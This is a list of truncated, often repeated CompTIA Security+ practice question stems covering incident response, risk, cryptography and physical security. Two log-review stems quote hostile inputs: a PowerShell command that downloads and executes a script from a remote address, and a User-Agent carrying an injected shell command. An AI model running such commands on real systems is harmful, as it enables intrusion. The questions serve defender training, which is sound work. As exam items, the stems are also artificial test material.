A penetration tester, who did not have an access badge, managed to follow a group of employees through multiple badged-access doors and into the data center wit ...

A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...

Question: A security analyst assesses the most common causes of downtime within the company and finds the following: Border firewalls are offline for vulnerabil ...

A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...

A software engineer is downloading a third-party application from a public repository and wants to ensure the application has not been maliciously altered. Whic ...

Which of the following is a security implication of using SDN over traditional methods?

Which of the following describes how often backups should occur in a COOP plan?

The Chief Information Security Officer gives the security community the opportunity to report vulnerabilities on the organization's public-facing assets. Which ...

Which of the following principles ensures data is only accessible to authorized users?

A penetration tester is testing the security of a building's alarm system following reports of unauthorized personnel entering the building. Which of the follow ...

A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...

A security analyst develops a threat model based on the recent news that Company A is using Company B. An investigation reveals that Company B told one of their ...

Which of the following would enable a data center to remain operational through a multiday power outage?

An office wants to install a Wi-Fi network. The security team must ensure a secure design. The security team expects the Wi-Fi access points to be more powerful ...

A security team identifies a vulnerability in an application that the developers will not be able to patch for six months. Which of the following should the sec ...

Which of the following is an internal audit team's function within risk management?

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Whic ...

Which of the following security concepts is the best reason for permissions on a human resources fileshare to follow the principle of least privilege?

Which of the following describes the reason root cause analysis should be conducted as part of incident response?

Which of the following describes a vulnerability that has been publicly exposed but does not yet have a remediation available from the manufacturer?

A software developer released a new application and is distributing application files via the developer's website. Which of the following should the developer p ...

A business needs a recovery site but does not require immediate failover. The business also wants to reduce the workload required to recover from an outage. Whi ...

Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...

A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. ...

Which of the following should be used to ensure that a new software release has not been modified before reaching the user?

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...

An organization wants to deploy software in a container environment to increase security. Which of the following will limit the organization's ability to achiev ...

The management team reports that employees are missing features on company-provided tablets, causing productivity issues. IT must resolve the issue within 48 ho ...

A company wants to minimize the chance of its outgoing marketing emails getting flagged as spam. The company decides to list the email servers on the proper DNS ...

An attacker uses XSS to compromise a web server. Which of the following solutions could have been used to prevent this attack?

The Chief Information Security Officer (CISO) has determined the company is non-compliant with local data privacy regulations. The CISO needs to justify the bud ...

Which of the following impact analysis metrics will best estimate the average operational availability of an asset?

Which of the following is a SIEM system using when monitoring Unix servers with only an SSH credentials login?

A security analyst is concerned malicious actors are lurking in an environment but has not received any alerts regarding suspicious activity. Which of the follo ...

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

A small business initially plans to open common communications ports (21, 22, 25, 80, 443) on its firewall to allow broad access to its screened subnet. However ...

An employee emailed a new systems administrator a malicious web link and convinced the administrator to change the email server's password. The employee used th ...

A security analyst investigates abnormal outbound traffic from a corporate endpoint. The traffic is encrypted and uses non-standard ports. Which of the followin ...

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verifie ...

A nation-state attacker gains access to the email accounts of several journalists by compromising a website that the journalists frequently use. Which of the fo ...

An engineer connects a new firewall into their corporate ISP modem. The engineer configures an outbound port using the public IP address provided by the ISP. Th ...

Which of the following best explains the benefit of using asymmetric encryption?

Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?

Which of the following methods will most likely be used to identify legacy systems?

A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...

A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?

Which of the following would a systems administrator follow when upgrading the firmware of an organization's router?

Which of the following is an example of passive reconnaissance against a company?

Question: Which of the following describes how a risk event might affect operations and limit the overall risk score?

An organization experiences data loss after several employees traveled to an area that is well-known for corporate espionage. The employees always used VPNs whe ...

A large organization has stable, well-established operations regarding its employee work hours, locations, and tasks. The large number of employees makes indivi ...

Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?

Which of the following best describes a common use of OSINT?

Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...

A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible ...

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Whi ...

An attacker forces an internal company employee to inject malware into corporate systems under threat of publishing the employee’s sensitive personal files. Whi ...

An attacker pretending to be from the help desk calls a user. The attacker asks the user to verify a password in order to fix a technical issue. Which of the fo ...

A user downloads a patch from an unknown repository to update their device. After applying the patch, the system becomes unresponsive. An incident response team ...

An IT security director performs a security assessment on a vendor but fails to disclose that the director’s spouse is a high-level executive with the vendor. W ...

Hacktivists change an organization’s page. The page's content is limited to static code and images. Which of the following should the organization use to detect ...

A Chief Information Security Officer (CISO) implements a new policy that users can no longer access fantasy sports sites while at work. The CISO wants to implem ...

Which of the following will oversee a cybersecurity program and provide guidance on risk appetite for an organization?

A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?

Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?

A company wants to ensure that only authorized devices can enter an environment. Which of the following will the company most likely use to implement the contro ...

An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is sa ...

A network security analyst monitors the network’s IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...

Which of the following best describes the importance of implementing filesystem journaling?

Which of the following is the greatest advantage that network segmentation provides?

When used with an access control vestibule, which of the following would provide the best prevention against tailgating?

A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...

A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...

Which of the following are the first steps in an incident response process?

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

An organization wants to deploy software in a container environment to increase security. Which of the following will limit the organization's ability to achiev ...

Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?

Which of the following mitigation techniques would a security analyst most likely use to avoid bloatware on devices?

To which of the following security categories does an EDR solution belong?

Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...

A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the f ...

Which of the following best explains a concern with OS-based vulnerabilities?

A user receives an aggressive text from an unknown sender who is demanding money. Which of the following attacks is this an example of?

A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...

Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?

Which of the following is an internal audit team's function within risk management?

A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible ...

An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take? (Select two)

A few weeks after deploying additional email servers, a company begins to receive complaints from employees that messages they send are going into their recipie ...

A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company most likely deploy?

An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...

Which of the following threat actors would most likely deface the website of a high-profile music group?

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government. Which of the following will ...

A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team ...

Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?

A Chief Information Security Officer is developing procedures to guide detective and corrective activities associated with common threats, including phishing, s ...

After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...

Which of the following would enable a data center to remain operational through a multiday power outage?

A security administrator must use a strategy to protect the company's data. The security administrator decides to deploy FDE on the end user devices and TLS for ...

A company wants to use new Wi-Fi-enabled environmental sensors in order to automatically collect metrics. Which of the following will the security team most lik ...

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...

Which of the following security measures should database servers containing passwords utilize? (Select two)

A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...

A network security analyst monitors the network's IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

A software engineer is downloading a third-party application from a public repository and wants to ensure the application has not been maliciously altered. Whic ...

After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?

Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?

Which of the following risk management strategies describes applying a compensating control to a device rather than patching?

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

A security team identifies a vulnerability in an application that the developers will not be able to patch for six months. Which of the following should the sec ...

A security analyst receives an alert categorized as suspicious activity after a standard user downloaded a .pdf file from a marketing website. The following occ ...

Which of the following activities identifies but does not exploit vulnerabilities?

A penetration tester, who did not have an access badge, managed to follow a group of employees through multiple badged-access doors and into the data center wit ...

Which of the following is a risk for a company using end-of-life applications on its network?

Which of the following is a one-way function that provides assurance of data integrity?

Which of the following solutions will most likely be used in the financial industry to mask sensitive data?

A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...

While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...

Which of the following describes effective change management procedures?

Which of the following is a use of CVSS?

A user downloads a patch from an unknown repository to update their device. After applying the patch, the system becomes unresponsive. An incident response team ...

Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?

The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on ...

Which of the following is used to calculate the impact to an organization per cybersecurity incident?

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...

A penetration tester is testing the security of a building's alarm system following reports of unauthorized personnel entering the building. Which of the follow ...

During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...

The help desk receives multiple calls indicating that machines are running slowly when running enterprise applications. The help desk notes that the affected ma ...

A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if t ...

Which of the following is the best way to validate the integrity and availability of a disaster recovery site?

Which of the following can assist in recovering data if the decryption key is lost?

A security engineer must deploy a sensor to actively monitor a closed network. The company's enterprise SIEM is located in the cloud, and there is a strict poli ...

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

While troubleshooting an internal resource's poor performance for an end user, a network engineer performs a traceroute on the end device and compares it with a ...

The Chief Information Security Officer gives the security community the opportunity to report vulnerabilities on the organization's public-facing assets. Which ...

A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates. Whi ...

Which of the following attacks primarily targets insecure networks?

Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?

A systems administrator configures a new application. The next day, a security analyst reviews the logs and identifies multiple accounts that had been created o ...

A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...

Which of the following is a primary security concern for a company setting up a BYOD program?

A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...

Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?

After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...

A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...

The physical security team at a company receives reports that employees are not displaying their badges. The team also observes employees tailgating at controll ...

A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best faci ...

An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...

A company asks a vendor to help its internal red team with a penetration test without providing too much detail about the infrastructure. Which of the following ...

An organization knows its single loss expectancy. Which of the following does the organization need in order to determine its annualized loss expectancy?

Which of the following activities is included in the post-incident review phase?

Which of the following should be used to prevent changes to system-level data?

Which of the following metrics are used to calculate the risk rating in a matrix format? (Select two.)

An application security engineer is working to address issues stemming from situations where necessary approvals and testing were not done before code was intro ...

A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...

Which of the following explains how a supply chain service provider could introduce a security vulnerability into an organization?

Employees receive a text message containing a link to a web page that prompts the user to enter their ID and a work phone number. The text message appears to co ...

Which of the following security concepts is accomplished with the installation of a RADIUS server?

Which of the following is a strategy to protect stored passwords?

A company discovers that an employee was paid by a competitor to save internal business files to a thumb drive and deliver it to the competitor. Which of the fo ...

A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...

Which of the following is the best safeguard to protect against an extended power failure?

Which of the following is a major security implication of connecting an ICS network to an enterprise network?

Which of the following security controls is a company implementing by deploying HIPS? (Select two.)

A company's accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and ...

Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two.)

Which of the following is the act of proving to a customer that software developers are trained on secure coding?

A security analyst reviews the following endpoint log: powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil ...

Which of the following should a systems administrator set up to increase the resilience of an application by splitting the traffic between two identical sites?

A software engineer is developing a new business application and needs to check for errors and security flaws before the software engineer compiles and sends it ...

An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...

Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?

After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...

Which of the following security control types does an acceptable use policy best represent?

A security analyst reviews the following SIEM events and observes multiple successful logins for the same user from geographically distant locations within minu ...

Which of the following techniques is used to assess the effectiveness of security controls that are designed to protect a system from unauthorized access?

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

Which of the following threat actors will most likely target an organization by using a logic bomb within an internally-developed application?

An administrator plans to apply a critical patch to a critical system. Which of the following is the first thing the administrator should do?

Which of the following phases of an incident response involves generating reports?

Which of the following is a prerequisite for a DLP solution?

An analyst wants to move data from production to the UAT server to test the latest release. Which of the following strategies to protect data should the analyst ...

During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...

Which of the following methods is the most effective for reducing vulnerabilities?

Which of the following should a security analyst use to prioritize the remediation of a vulnerability?

Which of the following security threats aims to compromise a website that multiple employees frequently visit?

Which of the following will help reduce alert fatigue?

The Chief Information Security Officer (CISO) of a medium-sized business plans to modernize the existing security infrastructure and address issues with legacy ...

A company's antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...

A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...

Which of the following will harden access to a new database system? (Select two)

Which of the following is an example of a certificate that is generated by an internal source?

A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes. Whic ...

A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...

A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?

An organization purchased and configured spare devices for all critical network infrastructure. Which of the following best describes the organization's reason ...

Which of the following tasks is typically included in the BIA process?

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

Which of the following is a one-way function that provides assurance of data integrity?

A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/id} 200 ...

A company is discarding a classified storage array and hires an outside vendor to complete the disposal. Which of the following should the company request from ...

Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...

A company plans to secure its systems by preventing users from sending sensitive data over corporate email and restricting access to potentially harmful website ...

A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...

While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impact if a generator was to develop a fault durin ...

A security engineer develops a policy to block all insecure protocols on the network. Which of the following ports should the security engineer block as part of ...

An administrator wants to create a comprehensive list of the technologies used at the company. Which of the following will best help with this task?

While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...

A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates. Whi ...

An attacker adds 40B of data as an input on a system that can handle only 4B. This causes the system to crash. Which of the following vulnerabilities did the at ...

A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with gl ...

An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based au ...

Which of the following techniques will mitigate the risk of sensitive data exposure when data is encoded with UTF-8 over a public network?

Which of the following attacks are most likely to exploit vulnerabilities in RTOS?

Alerts from email protection systems and MSSPs must be entered into an IT service management system and assigned to the security team. Which of the following sh ...

A software engineer is developing a new business application and needs to check for errors and security flaws before the software engineer compiles and sends it ...

A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...

Which of the following best describes a method for ongoing vendor monitoring in third-party risk management?

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...

Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?

A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?

A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...

An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...

A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...

Which of the following phases of an incident response involves generating reports?

Which of the following is the act of proving to a customer that software developers are trained on secure coding?

Which of the following should a security analyst use to prioritize the remediation of a vulnerability?

Which of the following is a strategy to protect stored passwords?

Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?

A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company most likely deploy?

An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...

A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...

Which of the following is a use of CVSS?

Which of the following scenarios is a warning sign specific to insider threats that should be included in a company's security awareness training?

Which of the following security concepts is accomplished with the installation of a RADIUS server?

Which of the following would be the most appropriate way to protect data in transit?

A security administrator wants to determine if the company's social engineering training is effective. Which of the following should the administrator do to com ...

Which of the following reduces oversight and places the most trust in the implementing organization?

Which of the following will help reduce alert fatigue?

Which of the following is the best way to validate the integrity and availability of a disaster recovery site?

In an effort to reduce costs, a company is implementing a strategy that gives employees access to internal company resources, including email, from personal dev ...

A new security team must develop necessary security program elements. Which of the following steps should the security team take first?

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verifie ...

Which of the following vulnerabilities will input validation prevent?

Which of the following techniques is used to assess the effectiveness of security controls that are designed to protect a system from unauthorized access?

A business unit decides to isolate its servers to address a vulnerability. Which of the following best describes this risk strategy?

A network security analyst monitors the network's IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...

An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...

Which of the following is used as a control on physical and digital assets and serves as a signal for employees to identify security requirements when accessing ...

Which of the following cyberattacks will use Unicode values in a website domain name instead of English alphabet letters?

Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?

Which of the following should an organization implement to avoid unnecessary liability after the end of a legal contract obligation with a third party?

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

A large organization has stable, well-established operations regarding its employee work hours, locations, and tasks. The large number of employees makes indivi ...

Which of the following is a possible consequence of a VM escape?

A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...

When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...

A company uses its backups to recover from a ransomware attack. Which of the following best guarantees that the backups are not infected?

The Chief Information Security Officer (CISO) requires that new servers include hardware-level memory encryption. Which of the following data states does the CI ...

Which of the following tasks is typically included in the BIA process?

A security engineer must deploy a sensor to actively monitor a closed network. The company's enterprise SIEM is located in the cloud, and there is a strict poli ...

Which of the following best explains why an organization would choose a warm site for disaster recovery?

A penetration test identifies that an SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...

Which of the following describes a vulnerability where a website under heavy load performs an unauthorized write operation seconds after the user authenticates?

An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints' definitions are up to date. Which of ...

Which of the following is a security implication of using SDN over traditional methods?

A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...

A site reliability engineer is designing a recovery strategy that requires quick fail over to an identical site if the primary facility goes down. Which of the ...

Which of the following will harden access to a new database system? (Select two)

Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?

A company must ensure that log searches are conducted in the shortest time frame. Which of the following should the company do to maintain logs in live storage ...

Which of the following is the most common data loss path for an air-gapped network?

An accounting clerk sent money to an attacker’s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following ...

Which of the following is a common, passive reconnaissance technique employed by penetration testers in the early phases of an engagement?

A systems administrator needs to provide traveling employees with a security measure that will protect company devices regardless of where they are working. Whi ...

Which of the following practices would be best to prevent an insider from introducing malicious code into a company's development process?

Which of the following best explains why using an appropriate algorithm is critical for digital signatures?

A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...

Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?

An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is sa ...

A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with gl ...

An organization purchased and configured spare devices for all critical network infrastructure. Which of the following best describes the organization's reason ...

Which of the following risk analysis attributes measures the chance that a vulnerability will be exploited?

A remote employee navigates to a shopping website on their company-owned computer. The employee clicks a link that contains a malicious file. Which of the follo ...

A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will hel ...

Which of the following best describes the main difference between an MOU and an SOW?

A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...

An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...

A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...

Which of the following is a strategy to protect stored passwords?

A software development team tests a new feature that processes user-uploaded files. A security engineer is concerned that attackers might upload malicious files ...

A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company's firewa ...

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...

A university uses two different cloud solutions for storing student data. Which of the following does this scenario represent?

Which of the following best represents how frequently an incident is expected to happen each year?

A security analyst investigates an incident in which a PowerShell script was identified as a potential IoC. Which of the following will best help the analyst id ...

A software engineering manager wants to scan the code for security vulnerabilities before it is pushed into production. Which of the following types of analysis ...

An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based au ...

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...

Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?

Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?

أرشيف أسئلة الاختبار

اختبار شهادة امن المعلومات CompTIA Security+

الأسئلة